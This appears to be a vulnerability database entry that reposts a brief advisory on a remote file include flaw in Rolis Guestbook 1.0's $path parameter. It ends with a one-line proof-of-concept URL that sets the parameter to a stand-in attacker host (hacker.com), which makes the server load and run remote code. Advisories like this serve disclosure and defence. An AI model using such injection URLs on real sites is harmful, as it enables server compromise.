Lucene search

K
seebugRootSSV:77151
HistoryJul 01, 2014 - 12:00 a.m.

Koch Roland Rolis Guestbook 1.0 $path Remote File Include Vulnerability

2014-07-0100:00:00
Root
www.seebug.org
15

No description provided by source.


                                                source: http://www.securityfocus.com/bid/9054/info

It has been reported that Rolis Guestbook may be vulnerable to an input validation issue that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system.

Rolis Guestbook version 1.0 has been reported to be prone to this issue, however other versions may be affected as well. 

http://www.example.com/rolis_book_path/insert.inc.php?path=http://hacker.com/